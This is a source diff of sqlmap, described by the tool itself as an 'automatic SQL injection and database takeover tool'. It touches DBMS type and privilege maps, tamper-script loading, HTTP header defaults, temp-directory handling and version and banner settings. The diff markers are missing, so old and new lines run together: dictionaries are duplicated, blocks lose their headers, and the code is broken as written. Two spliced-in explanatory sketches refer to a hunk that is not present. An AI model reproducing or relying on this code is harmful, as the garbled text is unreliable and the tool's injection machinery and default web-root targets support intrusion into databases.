paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
@@ -2223,6 +2227,10 @@ def getUnicode(value, encoding=None, noneToNull=False):
if noneToNull and value is None:
return NULL
if isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
if isinstance(value, unicode):
return value
elif isinstance(value, basestring):
@@ -2234,9 +2242,6 @@ def getUnicode(value, encoding=None, noneToNull=False):
return unicode(value, UNICODE_ENCODING)
except:
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
elif isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
else:
try:
return unicode(value)
@@ -2554,7 +2559,6 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg):
def getPageTemplate(payload, place): # Cross-linked function
raise NotImplementedError
@cachedmethod
def getPublicTypeMembers(type_, onlyValues=False):
"""
Useful for getting members from types (e.g. in enums)
@@ -2563,16 +2567,12 @@ def getPublicTypeMembers(type_, onlyValues=False):
['Linux', 'Windows']
"""
retVal = []
for name, value in inspect.getmembers(type_):
if not name.startswith('__'):
if not onlyValues:
retVal.append((name, value))
yield (name, value)
else:
retVal.append(value)
return retVal
yield value
def enumValueToNameLookup(type_, value_):
"""
@@ -3581,7 +3581,6 @@ def randomizeParameterValue(value):
return retVal
@cachedmethod
def asciifyUrl(url, forceQuote=False):
"""
Attempts to make a unicode URL usable with ``urllib/urllib2``.
@@ -4076,11 +4075,8 @@ def getRequestHeader(request, name):
"""
retVal = None
if request and name:
_ = name.upper()
retVal = max([value if _ == key.upper() else None for key, value in request.header_items()])
retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items())
return retVal
def isNumber(value):
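A small standalone sketch (plain re instead of sqlmap's extractRegexResult helper) of the web-directory extraction shown in the getAutoDirectories() hunk above: everything between the host part of the URL and the last path separator is taken as a candidate web directory.

    import re

    def web_directory(url):
        match = re.search(r"//[^/]+?(?P<result>/.*)/", url)
        return match.group("result") if match else None

    print(web_directory("http://www.example.com/dvwa/vulnerabilities/sqli/?id=1"))  # /dvwa/vulnerabilities/sqli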

View File

@@ -21,268 +21,219 @@ from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES
from lib.core.settings import INFORMIX_ALIASES
FIREBIRD_TYPES = {
261: "BLOB",
14: "CHAR",
40: "CSTRING",
11: "D_FLOAT",
27: "DOUBLE",
10: "FLOAT",
16: "INT64",
8: "INTEGER",
9: "QUAD",
7: "SMALLINT",
12: "DATE",
13: "TIME",
35: "TIMESTAMP",
37: "VARCHAR",
}
INFORMIX_TYPES = {
0: "CHAR",
1: "SMALLINT",
2: "INTEGER",
3: "FLOAT",
4: "SMALLFLOAT",
5: "DECIMAL",
6: "SERIAL",
7: "DATE",
8: "MONEY",
9: "NULL",
10: "DATETIME",
11: "BYTE",
12: "TEXT",
13: "VARCHAR",
14: "INTERVAL",
15: "NCHAR",
16: "NVARCHAR",
17: "INT8",
18: "SERIAL8",
19: "SET",
20: "MULTISET",
21: "LIST",
22: "ROW (unnamed)",
23: "COLLECTION",
40: "Variable-length opaque type",
41: "Fixed-length opaque type",
43: "LVARCHAR",
45: "BOOLEAN",
52: "BIGINT",
53: "BIGSERIAL",
2061: "IDSSECURITYLABEL",
4118: "ROW (named)",
}
261: "BLOB",
14: "CHAR",
40: "CSTRING",
11: "D_FLOAT",
27: "DOUBLE",
10: "FLOAT",
16: "INT64",
8: "INTEGER",
9: "QUAD",
7: "SMALLINT",
12: "DATE",
13: "TIME",
35: "TIMESTAMP",
37: "VARCHAR",
}
SYBASE_TYPES = {
14: "floatn",
8: "float",
15: "datetimn",
12: "datetime",
23: "real",
28: "numericn",
10: "numeric",
27: "decimaln",
26: "decimal",
17: "moneyn",
11: "money",
21: "smallmoney",
22: "smalldatetime",
13: "intn",
7: "int",
6: "smallint",
5: "tinyint",
16: "bit",
2: "varchar",
18: "sysname",
25: "nvarchar",
1: "char",
24: "nchar",
4: "varbinary",
80: "timestamp",
3: "binary",
19: "text",
20: "image",
}
14: "floatn",
8: "float",
15: "datetimn",
12: "datetime",
23: "real",
28: "numericn",
10: "numeric",
27: "decimaln",
26: "decimal",
17: "moneyn",
11: "money",
21: "smallmoney",
22: "smalldatetime",
13: "intn",
7: "int",
6: "smallint",
5: "tinyint",
16: "bit",
2: "varchar",
18: "sysname",
25: "nvarchar",
1: "char",
24: "nchar",
4: "varbinary",
80: "timestamp",
3: "binary",
19: "text",
20: "image",
}
MYSQL_PRIVS = {
1: "select_priv",
2: "insert_priv",
3: "update_priv",
4: "delete_priv",
5: "create_priv",
6: "drop_priv",
7: "reload_priv",
8: "shutdown_priv",
9: "process_priv",
10: "file_priv",
11: "grant_priv",
12: "references_priv",
13: "index_priv",
14: "alter_priv",
15: "show_db_priv",
16: "super_priv",
17: "create_tmp_table_priv",
18: "lock_tables_priv",
19: "execute_priv",
20: "repl_slave_priv",
21: "repl_client_priv",
22: "create_view_priv",
23: "show_view_priv",
24: "create_routine_priv",
25: "alter_routine_priv",
26: "create_user_priv",
}
1: "select_priv",
2: "insert_priv",
3: "update_priv",
4: "delete_priv",
5: "create_priv",
6: "drop_priv",
7: "reload_priv",
8: "shutdown_priv",
9: "process_priv",
10: "file_priv",
11: "grant_priv",
12: "references_priv",
13: "index_priv",
14: "alter_priv",
15: "show_db_priv",
16: "super_priv",
17: "create_tmp_table_priv",
18: "lock_tables_priv",
19: "execute_priv",
20: "repl_slave_priv",
21: "repl_client_priv",
22: "create_view_priv",
23: "show_view_priv",
24: "create_routine_priv",
25: "alter_routine_priv",
26: "create_user_priv",
}
PGSQL_PRIVS = {
1: "createdb",
2: "super",
3: "catupd",
}
1: "createdb",
2: "super",
3: "catupd",
}
# Reference(s): http://stackoverflow.com/a/17672504
# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
FIREBIRD_PRIVS = {
"S": "SELECT",
"I": "INSERT",
"U": "UPDATE",
"D": "DELETE",
"R": "REFERENCE",
"E": "EXECUTE",
"X": "EXECUTE",
"A": "ALL",
"M": "MEMBER",
"T": "DECRYPT",
"E": "ENCRYPT",
"B": "SUBSCRIBE",
}
# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm
# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm
INFORMIX_PRIVS = {
"D": "DBA (all privileges)",
"R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)",
"C": "CONNECT (work with existing tables)",
"G": "ROLE",
"U": "DEFAULT (implicit connection)",
}
"S": "SELECT",
"I": "INSERT",
"U": "UPDATE",
"D": "DELETE",
"R": "REFERENCE",
"E": "EXECUTE",
"X": "EXECUTE",
"A": "ALL",
"M": "MEMBER",
"T": "DECRYPT",
"E": "ENCRYPT",
"B": "SUBSCRIBE",
}
DB2_PRIVS = {
1: "CONTROLAUTH",
2: "ALTERAUTH",
3: "DELETEAUTH",
4: "INDEXAUTH",
5: "INSERTAUTH",
6: "REFAUTH",
7: "SELECTAUTH",
8: "UPDATEAUTH",
}
1: "CONTROLAUTH",
2: "ALTERAUTH",
3: "DELETEAUTH",
4: "INDEXAUTH",
5: "INSERTAUTH",
6: "REFAUTH",
7: "SELECTAUTH",
8: "UPDATEAUTH",
}
DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
DBMS_DICT = {
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"),
DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"),
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
}
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"),
DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"),
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
}
FROM_DUMMY_TABLE = {
DBMS.ORACLE: " FROM DUAL",
DBMS.ACCESS: " FROM MSysAccessObjects",
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS",
DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL"
}
DBMS.ORACLE: " FROM DUAL",
DBMS.ACCESS: " FROM MSysAccessObjects",
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
}
SQL_STATEMENTS = {
"SQL SELECT statement": (
"select ",
"show ",
" top ",
" distinct ",
" from ",
" from dual",
" where ",
" group by ",
" order by ",
" having ",
" limit ",
" offset ",
" union all ",
" rownum as ",
"(case ", ),
"SQL SELECT statement": (
"select ",
"show ",
" top ",
" distinct ",
" from ",
" from dual",
" where ",
" group by ",
" order by ",
" having ",
" limit ",
" offset ",
" union all ",
" rownum as ",
"(case ", ),
"SQL data definition": (
"create ",
"declare ",
"drop ",
"truncate ",
"alter ", ),
"SQL data definition": (
"create ",
"declare ",
"drop ",
"truncate ",
"alter ", ),
"SQL data manipulation": (
"bulk ",
"insert ",
"update ",
"delete ",
"merge ",
"load ", ),
"SQL data manipulation": (
"bulk ",
"insert ",
"update ",
"delete ",
"merge ",
"load ", ),
"SQL data control": (
"grant ",
"revoke ", ),
"SQL data control": (
"grant ",
"revoke ", ),
"SQL data execution": (
"exec ",
"execute ",
"values ",
"call ", ),
"SQL data execution": (
"exec ",
"execute ",
"values ",
"call ", ),
"SQL transaction": (
"start transaction ",
"begin work ",
"begin transaction ",
"commit ",
"rollback ", ),
}
"SQL transaction": (
"start transaction ",
"begin work ",
"begin transaction ",
"commit ",
"rollback ", ),
}
POST_HINT_CONTENT_TYPES = {
POST_HINT.JSON: "application/json",
POST_HINT.JSON_LIKE: "application/json",
POST_HINT.MULTIPART: "multipart/form-data",
POST_HINT.SOAP: "application/soap+xml",
POST_HINT.XML: "application/xml",
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
}
POST_HINT.JSON: "application/json",
POST_HINT.JSON_LIKE: "application/json",
POST_HINT.MULTIPART: "multipart/form-data",
POST_HINT.SOAP: "application/soap+xml",
POST_HINT.XML: "application/xml",
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
}
DEPRECATED_OPTIONS = {
"--replicate": "use '--dump-format=SQLITE' instead",
"--no-unescape": "use '--no-escape' instead",
"--binary": "use '--binary-fields' instead",
"--auth-private": "use '--auth-file' instead",
"--check-payload": None,
"--check-waf": None,
}
"--replicate": "use '--dump-format=SQLITE' instead",
"--no-unescape": "use '--no-escape' instead",
"--binary": "use '--binary-fields' instead",
"--auth-private": "use '--auth-file' instead",
"--check-payload": None,
"--check-waf": None,
}
DUMP_DATA_PREPROCESS = {
DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643
DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
}
DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643
DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
}
DEFAULT_DOC_ROOTS = {
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
}
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
}

View File

@@ -34,7 +34,6 @@ class DBMS:
SQLITE = "SQLite"
SYBASE = "Sybase"
HSQLDB = "HSQLDB"
INFORMIX = "Informix"
class DBMS_DIRECTORY_NAME:
ACCESS = "access"
@@ -48,7 +47,6 @@ class DBMS_DIRECTORY_NAME:
SQLITE = "sqlite"
SYBASE = "sybase"
HSQLDB = "hsqldb"
INFORMIX = "informix"
class CUSTOM_LOGGING:
PAYLOAD = 9

View File

@@ -155,7 +155,6 @@ from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.keepalive import keepalive
from thirdparty.multipart import multipartpost
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
from xml.etree.ElementTree import ElementTree
@@ -166,7 +165,6 @@ keepAliveHandler = keepalive.HTTPHandler()
proxyHandler = urllib2.ProxyHandler()
redirectHandler = SmartRedirectHandler()
rangeHandler = HTTPRangeHandler()
multipartPostHandler = multipartpost.MultipartPostHandler()
def _feedTargetsDict(reqFile, addedTargetUrls):
"""
@@ -883,32 +881,32 @@ def _setTamperingFunctions():
resolve_priorities = False
priorities = []
for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
found = False
script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
tfile = tfile.strip()
if not script:
if not tfile:
continue
elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)):
script = os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)
elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)):
tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)
elif not os.path.exists(script):
errMsg = "tamper script '%s' does not exist" % script
elif not os.path.exists(tfile):
errMsg = "tamper script '%s' does not exist" % tfile
raise SqlmapFilePathException(errMsg)
elif not script.endswith(".py"):
errMsg = "tamper script '%s' should have an extension '.py'" % script
elif not tfile.endswith('.py'):
errMsg = "tamper script '%s' should have an extension '.py'" % tfile
raise SqlmapSyntaxException(errMsg)
dirname, filename = os.path.split(script)
dirname, filename = os.path.split(tfile)
dirname = os.path.abspath(dirname)
infoMsg = "loading tamper script '%s'" % filename[:-3]
logger.info(infoMsg)
if not os.path.exists(os.path.join(dirname, "__init__.py")):
if not os.path.exists(os.path.join(dirname, '__init__.py')):
errMsg = "make sure that there is an empty file '__init__.py' "
errMsg += "inside of tamper scripts directory '%s'" % dirname
raise SqlmapGenericException(errMsg)
@@ -917,11 +915,11 @@ def _setTamperingFunctions():
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3])
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
except (ImportError, SyntaxError), ex:
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
@@ -953,7 +951,7 @@ def _setTamperingFunctions():
if not found:
errMsg = "missing function 'tamper(payload, **kwargs)' "
errMsg += "in tamper script '%s'" % script
errMsg += "in tamper script '%s'" % tfile
raise SqlmapGenericException(errMsg)
if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
@@ -1014,12 +1012,12 @@ def _setDNSCache():
"""
def _getaddrinfo(*args, **kwargs):
if args in kb.cache.addrinfo:
return kb.cache.addrinfo[args]
if args in kb.cache:
return kb.cache[args]
else:
kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache.addrinfo[args]
kb.cache[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache[args]
if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo
@@ -1166,7 +1164,7 @@ def _setHTTPHandlers():
debugMsg = "creating HTTP requests opener object"
logger.debug(debugMsg)
handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
handlers = filter(None, [proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
if not conf.dropSetCookie:
if not conf.loadCookies:
@@ -1396,12 +1394,16 @@ def _setHTTPExtraHeaders():
raise SqlmapSyntaxException(errMsg)
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
if conf.charset:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5"))
if not conf.charset:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
else:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
# Invalidating any caching mechanism in between
# Reference: http://stackoverflow.com/a/1383359
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))
# Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store"))
conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache"))
def _defaultHTTPUserAgent():
"""
@@ -1411,6 +1413,13 @@ def _defaultHTTPUserAgent():
return "%s (%s)" % (VERSION_STRING, SITE)
# Firefox 3 running on Ubuntu 9.04 updated at April 2009
#return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
# Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english
# updated at March 2009
#return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
def _setHTTPUserAgent():
"""
Set the HTTP User-Agent header.
@@ -1555,7 +1564,6 @@ def _createTemporaryDirectory():
os.makedirs(conf.tmpDir)
_ = os.path.join(conf.tmpDir, randomStr())
open(_, "w+b").close()
os.remove(_)
@@ -1571,29 +1579,21 @@ def _createTemporaryDirectory():
try:
if not os.path.isdir(tempfile.gettempdir()):
os.makedirs(tempfile.gettempdir())
except (OSError, IOError, WindowsError), ex:
warnMsg = "there has been a problem while accessing "
warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
warnMsg += "make sure that there is enough disk space left. If problem persists, "
warnMsg += "try to set environment variable 'TEMP' to a location "
warnMsg += "writeable by the current user"
logger.warn(warnMsg)
except IOError, ex:
errMsg = "there has been a problem while accessing "
errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
errMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user"
raise SqlmapSystemException, errMsg
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
try:
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
except (OSError, IOError, WindowsError):
tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
kb.tempDir = tempfile.tempdir
if not os.path.isdir(tempfile.tempdir):
try:
os.makedirs(tempfile.tempdir)
except (OSError, IOError, WindowsError), ex:
errMsg = "there has been a problem while setting "
errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
raise SqlmapSystemException, errMsg
os.makedirs(tempfile.tempdir)
def _cleanupOptions():
"""
@@ -1839,11 +1839,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.bruteMode = False
kb.cache = AttribDict()
kb.cache.addrinfo = {}
kb.cache.content = {}
kb.cache.encoding = {}
kb.cache.intBoundaries = None
kb.cache.parsedDbms = {}
kb.cache.regex = {}
kb.cache.stdev = {}
@@ -1977,6 +1973,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.threadContinue = True
kb.threadException = False
kb.tableExistsChoice = None
kb.timeValidCharsRun = 0
kb.uChar = NULL
kb.unionDuplicates = False
kb.xpCmdshellAvailable = False
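A self-contained sketch (module-level dict instead of sqlmap's kb cache object) of the getaddrinfo memoization pattern shown in the _setDNSCache() hunk above; note that, as in the hunk, keyword arguments are not part of the cache key.

    import socket

    _addrinfo_cache = {}

    def _getaddrinfo(*args, **kwargs):
        # resolve each unique argument tuple only once, then serve repeats from the cache
        if args not in _addrinfo_cache:
            _addrinfo_cache[args] = socket._getaddrinfo(*args, **kwargs)
        return _addrinfo_cache[args]

    if not hasattr(socket, "_getaddrinfo"):
        socket._getaddrinfo = socket.getaddrinfo   # keep a reference to the original resolver
        socket.getaddrinfo = _getaddrinfo          # monkey-patch in the caching wrapper

    # socket.getaddrinfo("sqlmap.org", 80)  # first call resolves, later identical calls hit the cache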

View File

@@ -235,7 +235,6 @@ optDict = {
"profile": "boolean",
"forceDns": "boolean",
"ignore401": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean",
"liveTest": "boolean",
"stopFail": "boolean",

View File

@@ -6,7 +6,6 @@ See the file 'doc/COPYING' for copying permission
"""
import os
import random
import re
import subprocess
import string
@@ -20,11 +19,10 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.10.0"
VERSION = "1.0.8.2"
REVISION = getRevisionNumber()
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
STABLE = VERSION.count('.') <= 2
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
DESCRIPTION = "automatic SQL injection and database takeover tool"
SITE = "http://sqlmap.org"
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
@@ -32,14 +30,12 @@ GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
# colorful banner
BANNER = """\033[01;33m\
___
__H__
___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| \033[0m\033[4;37m%s\033[0m\n
""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)
BANNER = """\033[01;33m _
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| \033[0m\033[4;37m%s\033[0m\n
""" % ((31 + hash(VERSION) % 6) if not STABLE else 30, VERSION_STRING.split('/')[-1], SITE)
# Minimum distance of ratio from kb.matchRatio to result in True
DIFF_TOLERANCE = 0.05
@@ -68,14 +64,13 @@ BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
RANDOM_INTEGER_MARKER = "[RANDINT]"
RANDOM_STRING_MARKER = "[RANDSTR]"
SLEEP_TIME_MARKER = "[SLEEPTIME]"
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
CHAR_INFERENCE_MARK = "%c"
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
# Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>([\w.]|`[^`<>]+`)+)"
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b"
# Regular expression used for recognition of textual content-type
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
@@ -89,9 +84,6 @@ MAX_CONNECTIONS_REGEX = r"max.+connections"
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
PRECONNECT_CANDIDATE_TIMEOUT = 10
# Maximum sleep time in "Murphy" (testing) mode
MAX_MURPHY_SLEEP_TIME = 3
# Regular expression used for extracting results from Google search
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
@@ -136,7 +128,7 @@ UNION_STDEV_COEFF = 7
TIME_DELAY_CANDIDATES = 3
# Default value for HTTP Accept header
HTTP_ACCEPT_HEADER_VALUE = "*/*"
HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
# Default value for HTTP Accept-Encoding header
HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
@@ -224,7 +216,6 @@ SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my")
@@ -237,11 +228,10 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES
